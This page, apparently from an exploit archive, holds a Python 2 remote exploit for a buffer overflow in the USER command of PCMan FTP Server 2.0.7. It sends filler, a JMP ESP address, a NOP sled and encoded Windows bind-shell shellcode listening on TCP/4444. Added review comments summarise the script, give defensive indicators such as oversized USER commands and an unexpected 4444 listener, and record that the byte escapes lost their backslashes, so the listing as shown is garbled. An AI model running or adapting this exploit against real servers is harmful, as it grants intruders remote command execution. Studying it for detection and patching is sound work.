Home / exploits PCMan's FTP Server 2.0.7 Remote Root
Posted on 28 June 2013
#!/usr/bin/env python
import signal
from time import sleep
from socket import *
from sys import exit, exc_info
#
# Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command
# Discovered and Reported******June 2013
# Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory*************http://infosec42.blogspot.com/
# Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21)
# Tested Commands*************USER (Other commands were not tested and may be vulnerable)
# CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending
#
# Reader's summary (Python 2 script: print statements, raw_input):
#   Builds one oversized FTP USER command (filler, a 4-byte return address,
#   a NOP run, an encoded payload, more filler) and sends it over a single
#   TCP connection to port 21 of the address typed in at the prompt, then
#   closes the socket. Nothing is read back; the script does not learn
#   whether the overflow succeeded (see the "Fingers crossed" message).
#
# NOTE(review): every byte escape on this page appears as "x42", "x90",
#   "xdb"... with no backslash, so as written these are 3-character ASCII
#   strings, not single bytes, and the byte counts in the comments below
#   (2004, 348, 2992) do not correspond to what this text would produce.
#   Presumably the backslashes were stripped when the listing was
#   extracted; treat the lengths as the author's intent, not as verified.
#
# Defender's view of the same listing:
#   - Affected software per the header: PCMan FTP Server v2.0.7 on TCP/21.
#     The trigger is a USER argument of several kilobytes (assuming one
#     byte per escape), most of it a long run of a single filler byte
#     (0x42) — an easy length-based rule for an FTP-aware IDS/proxy, and a
#     reason not to expose this service beyond a trusted network.
#   - The comments say the payload is a bind shell on TCP/4444; an
#     unexpected listener on that port on an FTP host, right after an
#     oversized USER command, is the post-exploitation indicator.
#   - The shell runs with whatever privileges the FTP service has;
#     "Root" in the title is presumably loose wording for a Windows target
#     (the payload comment names windows/shell_bind_tcp) — confirm.
def sigHandle(signum, frm): # Signal handler
    """SIGINT (ctrl + c) handler: print a message, pause, and exit.

    Installed in main(). Note that exit(0) raises SystemExit; on Python 2
    the bare `except:` clauses below catch SystemExit too, which is why
    the closing banner says ctrl + c must be pressed "repeatedly".
    """
    print " [!!!] Cleaning up the exploit... [!!!] "
    sleep(1)
    exit(0)
def targServer():
    """Prompt until the user enters a parseable IPv4 address; return it.

    inet_aton() is the only validation; inet_ntoa() just normalises the
    accepted text back to dotted-quad form. The bare except swallows
    every failure (including SystemExit from the signal handler) and
    re-prompts.
    """
    while True:
        try:
            server = inet_aton(raw_input(" [*] Please enter the IPv4 address of the PCMan FTP Server: >"))
            server = inet_ntoa(server)
            break
        except:
            # NOTE(review): this literal spans a line break on the page,
            # which is not valid in a plain string — presumably a lost
            # "\n" escape; confirm against the original listing.
            print " [!!!] Error: Please enter a valid IPv4 address. [!!!] 
"
            sleep(1)
            continue
    return server
def main():
    """Assemble the USER payload, connect to the target, send it once, close.

    Every network step is wrapped in try/except with a bare except that
    prints exc_info() and exits; no response from the server is read.
    """
    print (""" [*] Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command [*] Discovered and Reported******June 2013 [*] Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators [*] Exploit/Advisory*************http://infosec42.blogspot.com/ [*] Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21) [*] Tested Commands*************USER (Other commands were not tested and may be vulnerable) [*] CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending""")
    signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
    victim = targServer()
    port = int(21)  # standard FTP control port; not configurable here
    Cmd = "USER " #Vulnerable command
    # Filler that precedes the saved return address (author's count: 2004 bytes).
    JuNk = "x42" * 2004
    # KERNEL32.dll 7CA58265 - JMP ESP
    # (address written little-endian; specific to the author's test build —
    # the listing does not say which Windows version it was taken from)
    ret = "x65x82xA5x7C"
    NOP = "x90" * 50
    #348 Bytes Bind Shell Port TCP/4444
    #msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R |
    #msfencode -e x86/shikata_ga_nai -c 1 -b "x0dx0ax00xf1" R
    # The -b list above excludes CR, LF, NUL and 0xf1 from the encoded
    # payload, i.e. the bytes an FTP command parser would treat as
    # terminators (per the msfencode invocation recorded by the author).
    shellcode = "xdbxccxbax40xb6x7dxbaxd9x74x24xf4x58x29xc9"
    shellcode += "xb1x50x31x50x18x03x50x18x83xe8xbcx54x88x46"
    shellcode += "x56x72x3ex5fx5fx7bx3ex60xffx0fxadxbbxdbx84"
    shellcode += "x6bxf8xa8xe7x76x78xafxf8xf2x37xb7x8dx5axe8"
    shellcode += "xc6x7ax2dx63xfcxf7xafx9dxcdxc7x29xcdxa9x08"
    shellcode += "x3dx09x70x42xb3x14xb0xb8x38x2dx60x1bxe9x27"
    shellcode += "x6dxe8xb6xe3x6cx04x2ex67x62x91x24x28x66x24"
    shellcode += "xd0xd4xbaxadxafxb7xe6xadxcex84xd7x16x74x80"
    shellcode += "x54x99xfexd6x56x52x70xcbxcbxefx31xfbx4dx98"
    shellcode += "x3fxb5x7fxb4x10xb5xa9x22xc2x2fx3dx98xd6xc7"
    shellcode += "xcaxadx24x47x60xadx99x1fx43xbcxe6xdbx03xc0"
    shellcode += "xc1x43x2axdbx88xfaxc1x2cx57xa8x73x2fxa8x82"
    shellcode += "xebxf6x5fxd6x46x5fx9fxcexcbx33x0cxbcxb8xf0"
    shellcode += "xe1x01x6dx08xd5xe0xf9xe7x8ax8axaax8exd2xc6"
    shellcode += "x24x35x0ex99x73x62xd0x8fx11x9dx7fx65x1ax4d"
    shellcode += "x17x21x49x40x01x7ex6ex4bx82xd4x6fxa4x4dx32"
    shellcode += "xc6xc3xc7xebx27x1dx87x47x83xf7xd7xb8xb8x90"
    shellcode += "xc0x40x78x19x58x4cx52x8fx99x62x3cx5ax02xe5"
    shellcode += "xa8xf9xa7x60xcdx94x67x2ax24xa5x01x2bx5cx71"
    shellcode += "x9bx56x91xb9x68x3cx2fx7bxa2xbfx8dx50x2fxb2"
    shellcode += "x6bx91xe4x66x20x89x88x86x85x5cx92x02xadx9f"
    shellcode += "xbaxb6x7ax32x12x18xd5xd8x95xcbx84x49xc7x14"
    shellcode += "xf6x1ax4ax33xf3x14xc7x3bx2dxc2x17x3cxe6xec"
    shellcode += "x38x48x5fxefx3ax8bx3bxf0xebx46x3cxdex7cx88"
    shellcode += "x0cx3fx1cx05x6fx16x22x79"
    # Layout on the wire: "USER " + filler + ret + NOPs + payload + tail filler + " ".
    # The tail pads NOP+payload out to a fixed 2992 bytes so the total
    # request length is constant regardless of payload size.
    sploit = Cmd + JuNk + ret + NOP + shellcode
    sploit += "x42" * (2992 - len(NOP + shellcode)) + " "
    try:
        print " [*] Creating network socket."
        net_sock = socket(AF_INET, SOCK_STREAM)
    except:
        print " [!!!] There was an error creating the network socket. [!!!] %s " % exc_info()
        sleep(1)
        exit(0)
    try:
        print " [*] Connecting to PCMan FTP Server @ %s on port TCP/%d." % (victim, port)
        net_sock.connect((victim, port))
    except:
        print " [!!!] There was an error connecting to %s. [!!!] %s " % (victim, exc_info())
        sleep(1)
        exit(0)
    try:
        print """ [*] Attempting to exploit the FTP USER command. [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. [*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
        # Single send(); the FTP banner is never read, and send() is not
        # checked for a short write. No timeout is set on the socket.
        net_sock.send(sploit)
        sleep(1)
    except:
        print " [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!] %s " % (victim, exc_info())
        sleep(1)
        exit(0)
    try:
        print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution! [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup. """
        net_sock.close()
    except:
        print " [!!!] There was an error closing the network socket. [!!!] %s " % exc_info()
        sleep(1)
        exit(0)
if __name__ == "__main__":
    main()
